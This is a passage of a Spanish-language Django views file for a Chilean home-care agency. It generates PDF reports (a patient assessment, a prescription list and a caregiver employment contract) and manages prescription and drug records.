bloque\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(290,y,\"Transferirse:\")\n\tc.setFont('Helvetica', 10)\n\ty=y-15\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(50,y,\"Independiente:\")\n\tc.setFont('Helvetica', 10)\n\tc.drawString(125,y,\"Se baña completamente o necesita\")\n\t#segundo bloque\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(290,y,\"Independiente:\")\n\tc.setFont('Helvetica', 10)\n\tc.drawString(365,y,\"Entra y sale de la cama independientemente\")\n\t#\n\ty=y-15\n\tc.drawString(50,y,\"Necesita ayuda solo para jabonarse ciertas regiones\")\n\t#\n\t#segundo bloque\n\tc.drawString(290,y,\"se sienta y para de la silla (puede usar soporte mecánico)\")\n\t#\n\ty=y-15\n\tc.drawString(50,y,\"(espalda u otra extremidad dañada)\")\n\t#\n\ty=y-15\t\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(50,y,\"Dependiente:\")\n\tc.setFont('Helvetica', 10)\n\tc.drawString(118,y,\"Requiere ayuda para bañarse\")\n\t#segundo bloque\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(290,y,\"Dependiente:\")\n\tc.setFont('Helvetica', 10)\n\tc.drawString(358,y,\"Requiere ayuda para moverse\")\n\t#\n\ty=y-15\n\tc.drawString(50,y,\"(mas de una parte del cuerpo, o para entrar o\")\n\t#segundo bloque\n\tc.drawString(290,y,\"más transferencias.\")\n\t#\n\ty=y-15\t\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(50,y,\"Vestirse:\")\n\tc.setFont('Helvetica', 10)\n\t#segundo bloque\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(290,y,\"Continencia:\")\n\tc.setFont('Helvetica', 10)\n\t#\n\ty=y-15\t\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(50,y,\"Independiente:\")\n\tc.setFont('Helvetica', 10)\n\tc.drawString(124,y,\"Saca la ropa del closet viste y \")\t\n\t#\n\t#segundo bloque\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(290,y,\"Independiente:\")\t\n\tc.setFont('Helvetica', 10)\n\tc.drawString(364,y,\"Controla totalmente efinters\")\n\ty=y-15\n\tc.drawString(290,y,\"anal y vertical\")\t\n\t#\n\tc.drawString(50,y,\"desviste. Se excluye el anudar los cordones\")\n\t#\n\t#segundo bloque\n\ty=y-15\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(290,y,\"Dependiente:\")\t\n\tc.setFont('Helvetica', 10)\n\tc.drawString(358,y,\"Incontinencia total o parcial\")\n\t#\n\t#y=y-15\t\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(50,y,\"Dependiente:\")\n\tc.setFont('Helvetica', 10)\n\tc.drawString(119,y,\"No se viste solo, o lo hace a medias\")\t\n\t#\n\t#segundo bloque\n\ty=y-15\n\tc.drawString(290,y,\"para orinar u obrar: control parcial o total por enemas o\")\n\ty=y-15\n\tc.drawString(290,y,\"sondas o recolectores o uso regulado de chata\")\n\t#\n\t#return HttpResponse(str(y)) # \ty=154 \n\ty=162\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(50,y,\"Ir al Toilet:\")\n\tc.setFont('Helvetica', 10)\n\tc.setFont('Helvetica-Bold', 10)\t\n\ty=y-15\n\tc.drawString(50,y,\"Independiente:\")\n\tc.setFont('Helvetica', 10)\n\tc.drawString(124,y,\"llega al baño, se sienta y para el\")\t\n\ty=y-15\n\tc.drawString(50,y,\"del Toilet, se arregla la ropa y se limpia\")\n\t#\n\t#segundo bloque\n\tz=139\n\t#return HttpResponse(str(y)) # y=139\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(290,z,\"Alimentación:\")\t\n\tc.setFont('Helvetica', 10)\n\t#\n\ty=y-15\n\tc.drawString(50,y,\"(puede usar su propia chata en la noche y\")\n\ty=y-15\t\n\tc.drawString(50,y,\"usar soportes mecánicos)\")\n\n\t#segundo bloque\n\tz=z-15\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(290,z,\"Independiente:\")\t\n\tc.setFont('Helvetica', 10)\n\tc.drawString(364,z,\"lleva la comida del plato a la boca (se excluye\")\n\t#\n\ty=y-15\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(50,y,\"Dependiente:\")\n\tc.setFont('Helvetica',10)\n\tc.drawString(118,y,\"Requiere ayuda durante su estadia\")\n\ty=y-15\n\tc.drawString(50,y,\"en el toilete, o al usar chata (bedpan)\")\n\t#\n\t# segundo bloque\n\tz=z-15\n\tc.drawString(290,z,\"lleva la comida del plato a la boca (se excluye\")\n\tz=z-15\n\tc.drawString(290,z,\"el cortar la carne o preparar la comida)\")\n\t#\n\t#segundo bloque\n\tz=z-15\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(290,z,\"Dependiente:\")\t\n\tc.setFont('Helvetica', 10)\n\tc.drawString(364,z,\"Requiere asistencia para comer; no come\")\n\tz=z-15\n\tc.drawString(290,z,\"o usa alimentación entera o parental\")\n\t#\n\ty=y-30\n\tc.setFont('Helvetica-Bold', 12)\t\n\tc.drawString(50,y,\"OBSERVACIONES:\")\n\tc.setFont('Helvetica',10)\n\t#\n\t# linea para las observaciones\n\tc.line(50, y-15, 570, y-15) \n\n\t# linea vertical separadora de los blques\n\t# x y x1 y1 \n\tc.line(286, 325, 286, 60) \n\n\n\t## ######## FIN DEL REPORTE ####################\n\tc.showPage() #salto de pagina\n\tc.save() #Archivamos y cerramos el canvas\n\t#Lanzamos el pdf creado\n\tos.system(nom_arch)\n\n\t#desarrollo\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n#\n#\n#@login_required(login_url='login_ini')\n#def gestionremota2(request):\n#\tESTA FUNCION ESTÁ EN viwes2.py\n#\n#\n@login_required(login_url='login_ini')\ndef grid_receta(request):\n\tvariable1 = 'Recetas del paciente'\n\tvariable2 = 'Paciente:'\n\t# DICCIONARIO\n\tvia_lista = {'1':'Oral','2':'Inyectable','3':'Intranasal','4':'Rectal','5':'Sublingual',\n\t'6':'Endovenosa','7':'Intramuscular','8':'Subcutaneo','9':'Transdermico','10':'Inhalación',\n\t'11':'Sonda Nasogastrica','12':'Aplicación Tópica'}\n\n\tlogo_pdf = \"/static/img/logopdf.png\"\n\trut_aux = request.session.get('rut_x') # rescata variable global \n\tpaciente = Pacientes.objects.get(rut=rut_aux)\n\n\t#rut_aux = paciente.rut\n\tpaciente_id = paciente.id\n\treceta = Receta.objects.filter(rut=paciente.rut).order_by('descrip')\n\tcuenta = receta.count()\n\tcontext = {\n\t\t'receta':receta,\n\t\t'paciente':paciente,\n\t\t'variable1':variable1,\n\t\t'variable2':variable2,\n\t\t'logo_pdf':logo_pdf,\n\t\t'nombre':paciente.nombre,\n\t\t'rut_aux':rut_aux,\n\t\t'paciente_id':paciente_id,\n\t\t'via_lista':via_lista,\n\t\t'cuenta':cuenta,}\n\treturn render(request,'grid_receta.html',context)\n\n\n@login_required(login_url='login_ini')\ndef fichafarmaco(request,id):\n\tvariable1 = 'Ingresando / Actualizando Receta'\n\tfechahoy = datetime.now() \n\tdia_hoy = fechahoy.day \n\tmes_hoy = fechahoy.month\n\tano_hoy = fechahoy.year\n\tfecha_digita = str(ano_hoy)+\"-\"+str(mes_hoy).zfill(2)+\"-\"+str(dia_hoy).zfill(2) + \" 00:00:00\" \n\t#\n\t# LISTA\n\tvia_lista = ['Oral','Inyectable','Intranasal','Rectal','Sublingual',\n\t'Endovenosa','Intramuscular','Subcutaneo','Transdermico','Inhalación',\n\t'Sonda Nasogastrica','Aplicación Tópica']\n\n\tpaciente = Pacientes.objects.get(id=id)\n\tform = RecetaForm(request.POST or None)\n\n\treceta = Receta\n\tcontext = {\n\t\t\t\"receta\":receta,\n\t\t\t\"form\":form,\n\t\t\t\"variable1\":variable1,\n\t\t\t\"rut\":paciente.rut,\n\t\t\t\"paciente\":paciente.nombre,\n\t\t\t\"via_lista\":via_lista,}\n\tif request.method == \"POST\":\n\t\tif form.is_valid():\n\t\t\t# aqui van los campos que requieren un tratamiento antes de grabar sus valores\n\t\t\tfecha_pre = request.POST.get('fecha_prescri')+\" 00:00:00\" # fecha de prescripcion\n\t\t\tvia_x = request.POST.get('via_sumi') # viene de combobox - alimentado de una lista\n\t\t\tvia_x = int(via_x) + 1 # llega como string \n\t\t\t#\n\t\t\tcursor = connection.cursor() #es necesario: from django.db import connection\n\t\t\tcursor.execute(\"insert into ai_receta (rut,descrip,fecha_prescri,via_sumi,frecuencia,fecha_digita) \"\n\t\t\t\t\"values(%s,%s,%s,%s,%s,%s)\",\n\t\t\t\t[paciente.rut,\n\t\t\t\trequest.POST.get('descrip'),\n\t\t\t\tfecha_pre,\n\t\t\t\tstr(via_x),\n\t\t\t\trequest.POST.get('frecuencia'),fecha_digita])\n\n\t\t\treturn redirect('grid_receta')\n\treturn render(request,'ficha_receta.html',context)\n\n\n@login_required(login_url='login_ini')\ndef eliminafarma(request,id):\n\tvariable1 = 'Eliminación de farmaco desde la receta'\n\tsw1 = 'rec' # identificador para la template 'confirma_elimina.html'\n\tform = Receta.objects.get(id=id)\n\tdescrip = form.descrip\n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'descrip':descrip,\n\t\t'sw1':sw1,}\n\tif request.method == \"POST\":\t\n\t\tform.delete()\n\t\treturn redirect('grid_receta')\t#redirige a la URL\n\treturn render(request,'confirma_elimina.html',context)\n\n\n\n@login_required(login_url='login_ini')\ndef imprimereceta(request):\n\t# DICCIONARIO\n\tvia_lista = {'1':'Oral','2':'Inyectable','3':'Intranasal','4':'Rectal','5':'Sublingual',\n\t'6':'Endovenosa','7':'Intramuscular','8':'Subcutaneo','9':'Transdermico','10':'Inhalación',\n\t'11':'Sonda Nasogastrica','12':'Aplicación Tópica'}\n\n\tfechahoy = datetime.now()\n\tancho, alto = letter\t# alto=792,ancho=612 - posicion normal\t\n\tnom_arch = \"receta\"+nombrearch()+\".pdf\" # gestion remota\n\t#\n\t# desarrollo\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\t#\n\t#produccion\n\t#logo_corp = os.getcwd()+\"/misitio/staticfiles/img/Logo_AsistenciaIntegral.jpg\"\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, pagesize=letter)\n\t#\n\tc.setPageSize((ancho, alto))\n\t#\n\trut_aux = request.session['rut_x']\t\t\n\tpaciente = Pacientes.objects.get(rut=rut_aux) \n\treceta = Receta.objects.filter(rut=rut_aux).order_by('descrip')\n\n\t#if receta.descrip == None:\n\t#\tcontext = {\n\t#\t'receta':receta,\n\t#\t'paciente':paciente,\n\t#\t'variable1':'Recetas del paciente',\n\t#\t'variable2':variable2,\n\t#\t'logo_pdf':logo_pdf,\n\t#\t'nombre':paciente,}\n\t#\trender_template_to_response(\"grid_receta.html\", context)\t\n\t\n\n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\t# produccion\n\t#path_x = os.getcwd() +\"/misitio/pdfs/\"\n\n\t# Desarrollo\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\n\tarch_y = os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\t#\t\n\t# ######### COMIENZA EL REPORTE #####################################\t\t\n ## comienza primera pagina #########\n\tc.drawImage(logo_corp, 10, 710,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\tc.setFont('Helvetica-Bold',11)\n\tc.setLineWidth(.5)\n\tfila = 700\n\ttit = \"RECETA DEL PACIENTE\"\n\tc.drawString(230,fila+24,tit)\n\t# subrrayado\n\tc.line(230, fila+16, 357, fila+16) \n\n\t#sub-titulo\n\tc.drawString(50,fila-20,\"Paciente: \"+paciente.rut+\" \"+paciente.nombre)\n\n\tc.setFont('Helvetica',11)\n\n\t# fecha actual \n\tc.drawString(480,fila+50,\"Emisi��n: \"+str(fecha_actual())) # fecha_actual() en misfunciones.py\n\n\t# COMIENZA DEFINICION DE LISTADO\n\t#\n\tfila = 665\n\tc.line(50, fila, 550, fila) \n\tfila = fila - 15\n\tc.drawString(50,fila,\"Descripción\")\n\tc.drawString(180,fila,\"Frecuencia\")\n\tc.drawString(280,fila,\"Via suministro\")\n\tc.drawString(378,fila,\"Fecha de prescripción\")\n\tfila = fila - 15\n\tc.line(50, fila,550,fila) \n\t#\n\tfor rece in receta:\n\t\tfila=fila-15\n\t\tc.drawString(50,fila,rece.descrip)\n\t\tc.drawString(180,fila,rece.frecuencia)\t\t\n\t\tc.drawString(280,fila,via_lista[rece.via_sumi])\n\t\tfe = fecha_ddmmaaaa(rece.fecha_prescri) # entrega dd-mm-yyyy\n\t\tc.drawString(380,fila,fe)\n\n\tfila = fila -15\t\n\tc.line(50, fila,550,fila) \n\n\t#for rece in receta:\n\t#\tdata.append([[rece.descrip,rece.frecuencia,via_lista[rece.via_sumi],str(rece.fecha_prescri)[0:10]]])\n\n\t## ######## FIN DEL REPORTE #######################################\n\t#\n\tc.showPage() #salto de pagina\n\tc.save() #Archivamos y cerramos el canvas\n\t#Lanzamos el pdf creado\n\tos.system(nom_arch)\n\n\t#produccion\n\t#return FileResponse(open(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, 'rb'), content_type='application/pdf')\n\n\t#desarrollo\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\n\n@login_required(login_url='login_ini')\ndef farmacos(request):\n\tvariable1 = 'Base de datos de fármacos'\n\tmaefarm = Maefarm.objects.all().order_by('descrip')\n\tif request.method == \"POST\":\t\n\t\tbuscar = request.POST.get('buscar') # valor del template\t\t\n\t\tcheck1 = request.POST.get('check1') # valor del template\n\t\tif check1 == None: \n\t\t\t#return HttpResponse(str(check1))\n\t\t\tif buscar=='':\n\t\t\t\tmaefarm = Maefarm.objects.all().order_by('descrip')\n\t\t\telse:\t\n\t\t\t\tmaefarm = Maefarm.objects.filter(Q(descrip__icontains=buscar))\n\t\telse:\t\n\t\t\tmaefarm = Maefarm.objects.filter(Q(accionf__icontains=buscar))\n\tcuenta = 0\n\tfor ss in maefarm:\n\t\tcuenta = cuenta + 1\n\tcontext = {\n\t\t\"variable1\":variable1,\n\t\t\"maefarm\":maefarm,\n\t\t\"cuenta\":cuenta,}\t\n\treturn render(request,'grid_farmacos.html',context)\n\n\n@login_required(login_url='login_ini')\ndef addlinkfarmaco(request,id):\n\tvariable1 = 'Agregando Hiperlink al Farmaco / Suministro'\n\tvariable2 = ''\n\n\t# DOS LINEAS OBLIGATORIAS\n\tmaefarm = Maefarm.objects.get(id=id) # contiene los datos de los campos de la tabla\n\tform = MaefarmForm(request.POST or None, request.FILES or None,instance=maefarm)\n\t###\n\t#\n\tif request.method == \"POST\":\n\t\tif form.is_valid():\n\t\t\tcursor = connection.cursor() # es necesario: from django.db import connection\t\n\t\t\tcursor.execute(\n\t\t\t\"update ai_maefarm set link = %s where id = %s\",[maefarm.link,id])\n\t\t\treturn redirect('farmacos')\n\n\tcontext = {\n\t\t\"variable1\":variable1,\n\t\t\"form\":form,\n\t\t\"variable2\":variable2,\n\t\t}\n\treturn render(request,'ficha_linkfarmaco.html',context)\n\n\n@login_required(login_url='login_ini')\ndef Eliminafarmaco(request,id):\n\tform = Maefarm.objects.get(id=id)\n\t#messages.warning(request,\"Listo para borrar este farmaco\")\n\tform.delete()\n\treturn redirect('farmacos') # redirige a la URL\n\n@login_required(login_url='login_ini')\ndef csvfarmacos(request):\n\titems = Maefarm.objects.all().order_by('descrip')\n\tresponse = HttpResponse(content_type = 'text/csv')\n\tresponse['Content-Disposition'] = 'attachment;filename=\"farmaco.csv\"'\n\twriter=csv.writer(response,delimiter=';')\n\n\t#nombre de los campos\n\twriter.writerow(['cod','descrip','accionf','unidad','codbar','unient','conten','id'])\n\n\t#contenido d elos campos\n\tfor obj in items:\n\t\twriter.writerow([obj.cod,obj.descrip,obj.accionf,obj.unidad,obj.codbar,obj.unient,obj.conten,obj.id])\n\treturn response\n\n\n### PARA PRUEBA #####\ndef validate_username(request):\n username = request.GET.get('username', None)\n data = {\n 'is_taken': User.objects.filter(username__iexact=username).exists()\n }\n return JsonResponse(data)\n\n### PARA PRUEBA #####\ndef siexiste_cui(request):\n \treturn HttpResponse ('hello world!')\n\t#rut_x = request.GET.get('rut', None)\n\t#return HttpResponse(\"llegó con el rut: \"+str(rut_x))\n\t#resultado = cuidador.objects.filter(rut=rut_x).exists()\n\t#data ={'resultado':resultado}\n\t#return HttpResponse(json.dumps(data), content_type=\"application/json\")\n\n\n@login_required(login_url='login_ini')\ndef contrato(request):\n\tfechahoy = datetime.now()\n\tancho, alto = letter\t# alto=792,ancho=612 - posicion normal\t\n\tnom_arch = \"contrat_cui\"+nombrearch()+\".pdf\" # gestion remota\n\t#\n\t# desarrollo\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\t#\n\t#produccion\n\t#logo_corp = os.getcwd()+\"/misitio/staticfiles/img/Logo_AsistenciaIntegral.jpg\"\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, pagesize=letter)\n\t#\n\tc.setPageSize((ancho, alto))\n\t#\n\tid_x = request.session.get('id_x') # recupera valor desde variable global\n\tcuidador = Cuidadores.objects.get(id=id_x)\n\n\tfe_ini_y = cuidador.fe_ini\n\tif cuidador.fe_ini == None:\n\t\treturn HttpResponse(\"Fecha de inicio en la empresa está en blanco, completela !!\")\n\n\tfe_ini_y = cuidador.vence_contrato\n\tif cuidador.vence_contrato == None:\n\t\treturn HttpResponse(\"Fecha de VENCIMIENTO DEL CONTRATO está en blanco, completela !!\")\n\n\tfe_nac_y = cuidador.fe_nac\n\tif cuidador.fe_nac == None:\n\t\treturn HttpResponse(\"Fecha de nacimiento está en blanco, completela !!\")\n\n\tecivil_y = cuidador.ecivil\n\tif cuidador.ecivil == None:\n\t\tecivil_y = \"2\"\n\n\tnacionalidad_x = cuidador.nacionalidad\t\n\tif cuidador.nacionalidad == None or cuidador.nacionalidad == '':\n\t\tnacionalidad_x = \"CHILENA\"\n\n\tafp_y = cuidador.afp\n\tif cuidador.afp == None or cuidador.afp == '':\n\t\treturn HttpResponse(\"Institución previsional está en blanco, complétela !!\")\n\n\tsalud_y = cuidador.salud\n\tif cuidador.salud == None or cuidador.salud == '':\n\t\treturn HttpResponse(\"Institución de salud está en blanco, complétela !!\")\n\n\tecivil_x = Param.objects.get(tipo='ECIVI',codigo=ecivil_y)\n\tregion_x = Param.objects.get(tipo='REGI',codigo=cuidador.region)\n\tcomuna_x = Param.objects.get(tipo='COMU',codigo=cuidador.comuna)\n\n\t# produccion\n\t#path_x = os.getcwd() +\"/misitio/pdfs/\"\n\n\t# Desarrollo\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\n\tarch_y = os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\t#\t\n\t# ######### COMIENZA EL REPORTE #####################################\t\t\n ## comienza primera pagina #########\n\tc.drawImage(logo_corp, 10, 710,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\tc.setFont('Helvetica-Bold',11)\n\tc.setLineWidth(.5)\n\tfila = 700\n\ttit = \"CONTRATO DE TRABAJO\"\n\tc.drawString(230,fila+24,tit)\n\t# subrrayado\n\tc.line(230, fila+16, 368, fila+16) \n\t#\n\tc.setFont('Helvetica',11)\n\t#\n\t# fecha actual \n\tc.drawString(480,fila+50,\"Emisión: \"+str(fecha_actual())) # fecha_actual() en misfunciones.py\n\t#\n\t#\n\t# COMIENZA DEFINICION DE LISTADO\n\tfila = 675\n\t#fila = fila - 15\n\tc.drawString(50,fila,\"En Santiago, a \"+fecha_palabra(fe_ini_y)+\", entre ASISTENCIA INTEGRAL LIMITADA, representada por\")\n\tfila = fila - 15\n\tc.drawString(50,fila,\"ANTONIO J. ANTONIO CASTILLO ROJAS, RUT: 13.477.178-K, en adelante 'el empleador', domiciliado\")\n\tfila = fila - 15\n\tc.drawString(50,fila,\"en CALLE EL OLIVILLO 6036, comuna de PEÑALOLEN, cuidad de SANTIAGO, y don(ña):\")\n\tfila = fila - 15\n\tc.drawString(50,fila,cuidador.nombre+\", en adelante 'el trabajador', CI: \"+cuidador.rut)\t\n\tfila = fila - 15\n\tc.drawString(50,fila,\"de nacionalidad \"+nacionalidad_x)\t\n\tfila = fila - 15\n\tc.drawString(50,fila,\"estado civil: \"+str(ecivil_x)+\", nacido el \"+fecha_palabra(fe_nac_y)+\", con domicilio en:\")\t\n\tfila = fila - 15\n\tc.drawString(50,fila,cuidador.direccion+\", comuna de \"+str(comuna_x)+\", región \"+str(region_x)+\", se\")\t\n\tfila = fila - 15\n\tc.drawString(50,fila,\"ha convenido el siguiente contrato de trabajo: \")\t\n\tfila = fila - 30\n\tc.drawString(50,fila,\"PRIMERO: La empresa ASISTENCIA INTEGRAL LIMITADA, contrata a\")\t\n\n\tc.setFont('Helvetica-Bold',11)\n\tfila = fila - 15\n\tc.drawString(75,fila,cuidador.nombre)\t\n\tc.setFont('Helvetica',11)\n\n\tfila = fila - 15\n\tc.drawString(75,fila,\"quien acepta y se compromete a relizar el trabajo de asistente de enfermos y/o Cuidador(a) de\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"de enfermos, o cualquier otra labor a fin que le encomiende el empleador o sus superiores.\")\t\n\tfila = fila - 30\n\tc.drawString(50,fila,\"SEGUNDO: El trabajador(a) deberá prestar sus servicios de manera DOMICILIARIA donde la empresa\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"mantenga contrato, dentro de la ciudad de Santiago.\")\t\n\tfila = fila - 30\n\tc.drawString(50,fila,\"TERCERO: La jornada de trabajo sera la siguiente:\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"De lunes a domingo, entre 8:00 y 20:00 horas con descansos para la alimentación de una hora\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"de colación entre las 13:00 y las 15:00 horas, asimismo la jornada podrá ser ditribuida conforme\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"a los requerimientos de cada paciente asignado no superando el maximo de 45 horas semanales.\")\t\n\tfila = fila - 30\n\tc.drawString(50,fila,\"CUARTO: La remuneración del trabajador será la suma mensual de $301.000.- sueldo base\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"(trrescientos mil pesos), mas el 25% de gratificación legal, con tope de 4,75 ingresos minimos\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"anuales, los que serán cancelados por turnos realizados, y que serán liquidados y pagados por \")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"períodos vencidos, en las oficinas del empleador, el dia 5 del mes siguiente asl trabajado.\")\t\n\n\tfila = fila - 15\n\tc.setFont('Helvetica-Bold', 11)\n\tc.drawString(75,fila,\"Otras asignaciones:\")\t# titulo de la table\n\tc.setFont('Helvetica', 11)\n\tfila = fila - 15\n\t#\n\t# COMIENZA TABLE #######################\n\tdata = [\n\t\t[\"Alimentación\",\"$15.000\"],\n\t\t[\"Asignación de movilización\",\"$25.000\"],\n\t\t[\"Asignación domiciliaria\",\"$30.000\"],\n\t]\n\t#\n\tt = Table(data, rowHeights=20, colWidths=[150,200]) # 20=Alto de fila\n\t#\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n#\n\tw, h = t.wrap(100, 100) # obligatorio\n\tt.drawOn(c, 75, 220, 0)\t# posicion de la table: abcisa=75,ordenada = 240 \n\tfila = 205\n\tc.drawString(70,fila,\"-El bono de asignación domiciliaria se otorgará siempre y cuando el o la asistente se encuentre\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"prestando servicios fuera de los lugares considerados como Establecimientos de Salud.\")\n\tfila = fila - 15\n\tc.drawString(70,fila,\"-Los turnos anexos tendrán un valor por jornada de $16.000, los cuales serán de tipo voluntario\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"e incluidos en su totalidad en la liquidación mensual del trabajador.\")\n\tfila = fila - 30\n\tc.drawString(50,fila,\"QUINTO: Son obligaciones escenciales del trabajador, cuya infracción las partes entienden como causa\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"justificada de terminación del presente contrato, las siguientes:\")\t\n\n\tfila = fila - 30\n\tc.drawString(75,fila,\"a) Cuidar y mantener en perfecto estado de conservación, las maquinas, utiles y otros bienes de \")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"de la emnpresa\")\t\n\n\tfila = fila - 30\n\tc.drawString(75,fila,\"b) Cumplir las instruciones y órdenes que le imparta cualquiera de sus superiores\")\t\n\n\tc.showPage() #salto de pagina ######### salto de pagina ######### salto de pagina #########\n\tfila = 710\n\tc.drawString(75,fila,\"c) En casos de insistencia al trabjo, por enfermedad, el trabajador deberá justificarla con el\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"correspondiente certificado médico, otorgado por un facultativo, dentro del plazo de 48\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"horas siguientes, desde el día aquel que dejó de asistir al trabajo.\")\t\n\n\tfila = fila - 30\n\tc.drawString(75,fila,\"d) Todo lo señalado en el reglamento interno que se adjunta.\")\t\n\n\tfila = fila - 30\n\tc.drawString(50,fila,\"SEXTO: Se prohíbe al trabajador, efectuar negocios o actividades dentro del giro de la empresa,\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"que es aquel en que opera el empleador.\")\t\n\n\tfila = fila - 15\n\tc.drawString(75,fila,\"Así mismo se le prohíben los siguientes actos:\")\t\n\n\tfila = fila - 15\n\tc.drawString(60,fila,\"1.-Ejecutar durante la jornada de trabajo, actividades ajenas a las actividades de la empresa.\")\t\n\t\n\tfila = fila - 15\n\tc.drawString(60,fila,\"2.-Dañar la imagen de la empresa u opiniones que trasgredan la ley.\")\t\n\n\tfila = fila - 15\n\tc.drawString(60,fila,\"3.-Usar en beneficio propio las instalaciones y/o muebles, útiles de la empresa, o\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"cualquier acto que dañe el patrimonio de esta.\")\n\n\tfila = fila - 15\n\tc.drawString(60,fila,\"4.-Efectuar tareas para las que fue contratado en forma negligente que impliquen\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"daños patrimoniales o mermas en los ingresos de la empresa.\")\n\n\tfila = fila - 15\n\tc.drawString(60,fila,\"5.-Realizar negociaciones con los pacientes asignados o los familiares de estos.\")\n\n\tfila = fila - 30\n\tc.drawString(50,fila,\"SEPTIMO: : Este contrato tendrá vigencia hasta el \"+fecha_palabra(cuidador.vence_contrato)+\". Las partes pueden\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"ponerle término en común acuerdo.\")\n\n\tfila = fila - 30\n\tc.drawString(50,fila,\"OCTAVO:Se deja constancia que el trabajador ingresó al servicio del empleador el 19 de\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"septiembre de 2019.\")\n\n\tfila = fila - 30\n\tc.drawString(50,fila,\"NOVENO: Se deja constancia que el trabajador cotizará en el régimen previsional chileno,\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"comprometiéndose el empleador a efectuar las retenciones y entregarlas a las\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"instituciones correspondientes.\")\n\tfila = fila - 30\n\tc.setFont('Helvetica-Bold', 11)\n\tc.drawString(75,fila,\"Institución de previsión: \"+afp_y+\" Salud: \"+salud_y)\n\tc.setFont('Helvetica', 11)\n\tfila = fila - 30\n\tc.drawString(50,fila,\"DECIMO: Para todos los efectos derivados de este contrato, las partes fijan su domicilio en la\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"ciudad de Santiago y se someten a la jurisprudencia de sus tribunales.\")\n\n\tfila = fila - 30\n\tc.drawString(50,fila,\"DECIMO PRIMERO: El presente contrato se emite en dos ejemplares. Cada ejemplar está compuesto\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"por dos hojas. Previa lectura, en señal de aceptación, se ratifica y firman las partes, Se deja\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"Cosntancia que el trabajador recibe un ejemplar íntegro de este contrato.\")\n\n\tfila = fila - 60\n\tc.line(75, fila, 255, fila)\n\tc.line(330, fila, 485, fila)\n\tfila = fila - 15 \n\tc.drawString(75,fila,\"ASISTENCIA INTEGRAL LTDA.\")\n\tc.drawString(330,fila,cuidador.nombre)\n\tfila = fila - 15\n\tc.drawString(75,fila,\"Antonio J. Castillo Rojas.\")\n\tc.drawString(330,fila,\"Trabajador(a)\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"Representante Legal\")\n\t## ######## FIN DEL REPORTE #######################################\n\tc.showPage() #salto de pagina\n\tc.save() #Archivamos y cerramos el canvas\n\t#Lanzamos el pdf 